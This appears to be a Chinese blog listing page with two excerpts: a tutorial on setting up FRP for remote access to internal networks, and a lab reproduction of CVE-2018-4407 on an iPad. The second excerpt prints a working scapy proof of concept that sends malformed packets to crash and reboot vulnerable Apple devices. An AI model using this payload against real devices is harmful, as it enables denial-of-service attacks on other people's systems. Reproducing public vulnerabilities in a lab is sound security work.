Mac

  • 快丢弃“某x壳”、“某x葵”等工具!快来一起使用FRP!FRP制作内网神器!

    最近小编很苦恼!为啥呢、第一我的Teamview又被检测商用、这是这个月第二次了!这次久久不给解封无奈。第二是“某x壳”太过于勤劳打电话催续费与推销、但是我感觉实用性并不强、于是跟朋友请教内网穿透有啥骚操作、果不其然!朋友推荐一个FRP的工具!废话不多说、上手操作! FRP下载地址GitHub:https://github.com/fatedier/frp/releases 本文章使用版本为v0.24.1最新版本! FRP官方中文详细文档:https://github.com/fatedier/frp/blob/master/README_zh.md#%E4%BD%BF%E7%94%A8%E7%A4%BA%E4%BE%8B FRP是什么呢? frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。 FRP架构演示图: 前期需要什么内容? 首先需要有一台公网IP的设备(服务器、vps、推荐使用首席云、价格实惠、产品可靠) 服务器的作用主要是他有公网IP、我们也知道、如果需要穿透内网的话你必须要公网IP的、那么久是说服务器作为反向代理、作为外网设备访问内网设备的一个桥梁。 服务器进行安装FRP 服务器上使用的为ubutun系统、内网机器使用win10系统! 服务器首先安装一下FRP wget https://github.com/fatedier/frp/releases/download/v0.24.1/frp_0.24.1_linux_amd64.tar.gz 不同服务器版本不一致:请自行选择下载、 地址:https://github.com/fatedier/frp/releases 下载完成后可以新建一个自己喜欢的目录存放进去、也可以直接就这样、个人喜欢分类一下 新建 mkdir -p /user/local/frp 将文件放置在这个目录下 进行解压操作: tar -zxvf frp_0.24.1_linux_amd64.tar.gz 删除不必要的文件 rm -f frpc rm -f frpc.ini 接下来要修改服务器配置文件,即frps.ini文件。使用vim指令对目标文件进行编辑。 vim frps.ini 打开后如下 [common] bind_port = 7000 ;要绑定的端口自己定义 vhost_http_port = 7005;//只做测试用HTTP、 为下文HTTP的采用!可以不用管这个地方的、也不用写! 但是如果你有需要HTTP那么就要这么写 此处为简化操作、因为只需要连接win系统、那么就可以这样既可! 后续会继续操作其他内容、或者有兴趣者可以参考GitHub链接查阅 启动FRPs ./frps -c ./frps.ini 客户端的配置操作 客户端为win10、那么就下载win的软件既可 注意自己的系统版本哟 首先删掉frps、frps.ini两个文件,然后再进行配置frpc.ini文件 [common] server_addr = xxx.xxx.xxx.xxx #公网服务器ip server_port = 7000 #与服务端bind_port一致 #公网通过ssh访问内部服务器 [ssh]//这只是一个名称你可以随意更改! type = tcp #连接协议 远程连接是采用tcp的 local_ip = 192.168.3.48 #内网服务器ip local_port = 3389 #win默认端口号…

    2019年2月27日 0 50 0
  • CVE-2018-4407(IOS缓冲区溢出漏洞复现)

    环境:用手机开启的热点,pc本一台,ipad一台 pc电脑:192.168.43.30 ipad:192.168.43.145 影响版本 Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6): 所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6): 所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备 首先设备需要连接在同一个局域网内 然后查看你的苹果系统版本是否符合、这里是11的版本那么可以使用这个poc进行复现的 安装scapy模块 pip install scapy 执行脚本程序 python cve-2018-4407.py 最后执行成功、iPad被重启 附上poc #pip install scapy import scapy from scapy.all import * send(IP(dst=”192.168.43.145″,options=[IPOption(“A”*8)])/TCP(dport=2323, options=[(19, “1”*18),(19, “2”*18)])) 文章转载零组攻防实验室 其他文献参考: FreeBuf FreeBuf

    2018年11月1日 0 48 1